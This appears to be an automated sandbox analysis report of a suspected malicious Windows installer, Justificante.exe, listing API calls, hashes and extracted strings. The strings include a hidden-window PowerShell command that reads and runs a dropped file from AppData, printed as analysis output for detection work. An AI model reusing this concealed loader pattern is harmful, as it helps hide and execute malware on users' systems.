                          • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                          • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                          • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                          APIs
                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: ab93fb311b540cfba5f716726d6ded9f0accba70f4a9561cc02b9cfac86f6025
                          • Instruction ID: 7206a17c4d5fce065d1639f2aed3a35bc4cb39007168cc9cbc0cfc9d8a61edfe
                          • Opcode Fuzzy Hash: ab93fb311b540cfba5f716726d6ded9f0accba70f4a9561cc02b9cfac86f6025
                          • Instruction Fuzzy Hash: F4F0543160411497CB10AFB68F0DD5F33649F52328F254A3FB421B21D1D6FD8942556F
                          APIs
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                          • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                          • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                          • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                          APIs
                          • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PathSearch
                          • String ID:
                          • API String ID: 2203818243-0
                          • Opcode ID: 306ba877737f5f79caabae69db5a0b9a44cd0244ae65e30377372c17e1f0e8e0
                          • Instruction ID: 8655e5fe009c5ad16bea028e6ef65502ba04d8f6e2b512f500e54641b6ee4b59
                          • Opcode Fuzzy Hash: 306ba877737f5f79caabae69db5a0b9a44cd0244ae65e30377372c17e1f0e8e0
                          • Instruction Fuzzy Hash: 94E04872714244ABD700DFA4DD49EAB7368EF50358B304536A611A50C1D6B459419729
                          APIs
                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 00406400
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                          • Instruction ID: a37d777e965e9699b0e23720f5de0982c89539c866ab1c77fb99c91eca42481e
                          • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                          • Instruction Fuzzy Hash: B2E0E672010109BFEF195F50ED0ADBB371DE704340F11452EFD07D4051E6B5A930A674
                          APIs
                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F4A6,0040CEF0,00403511,0040CEF0,0040F4A6,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                          • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                          APIs
                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                          • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                          APIs
                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406437,?,00000000,?,?,trikinse,?), ref: 004063CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          APIs
                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          APIs
                          • ShellExecuteExW.SHELL32(?), ref: 00405B77
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID:
                          • API String ID: 587946157-0
                          APIs
                          • SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,0040428B), ref: 004044BE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          APIs
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                            • Part of subcall function 00405B25: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                            • Part of subcall function 00405B25: CloseHandle.KERNEL32(?), ref: 00405B5B
                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                            • Part of subcall function 004069DC: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                            • Part of subcall function 004069DC: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A0F
                            • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                          • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                          • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                          • lstrcmpiW.KERNEL32(trikinse,00423748,00000000,?,?), ref: 00404AEA
                          • lstrcatW.KERNEL32(?,trikinse), ref: 00404AF6
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                            • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                            • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                            • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                            • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                            • Part of subcall function 004067EB: CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                            • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                            • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                            • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                          Strings
                          • trikinse, xrefs: 00404AE4, 00404AE9, 00404AF4
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated, xrefs: 00404AD3
                          • "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare, xrefs: 0040499C
                          • A, xrefs: 00404AA6
                          • H7B, xrefs: 00404A80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$A$C:\Users\user\AppData\Local\unavailability\unmeliorated$H7B$trikinse
                          • API String ID: 2624150263-3290625343
                          APIs
                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                          Strings
                          • C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer, xrefs: 00402261
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer
                          • API String ID: 542301482-3767348336
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                          • GetDlgItem.USER32(?,000003E8), ref: 00404703
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                          • GetSysColor.USER32(?), ref: 00404731
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                          • lstrlenW.KERNEL32(?), ref: 00404752
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                          • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                          • SendMessageW.USER32(00000000), ref: 004047D4
                          • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                          • SetCursor.USER32(00000000), ref: 00404853
                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                          • SetCursor.USER32(00000000), ref: 0040486F
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                          • String ID: N$trikinse
                          • API String ID: 3103080414-331164461
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                          • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                            • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                            • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                          • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                          • wsprintfA.USER32 ref: 00406207
                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                          • GlobalFree.KERNEL32(00000000), ref: 004062F0
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                            • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                            • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                          • API String ID: 2171350718-2295842750
                          • Opcode ID: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                          • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                          • Opcode Fuzzy Hash: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                          • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                          • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                          • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                          • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                          • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                          • CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                          • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                          Strings
                          • *?|<>/":, xrefs: 0040683D
                          • "C:\Users\user\Desktop\Justificante.exe", xrefs: 004067EB
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1776759244
                          • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                          • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                          • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                          • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                          • GetSysColor.USER32(00000000), ref: 00404554
                          • SetTextColor.GDI32(?,00000000), ref: 00404560
                          • SetBkMode.GDI32(?,?), ref: 0040456C
                          • GetSysColor.USER32(?), ref: 0040457F
                          • SetBkColor.GDI32(?,?), ref: 0040458F
                          • DeleteObject.GDI32(?), ref: 004045A9
                          • CreateBrushIndirect.GDI32(?), ref: 004045B3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmp
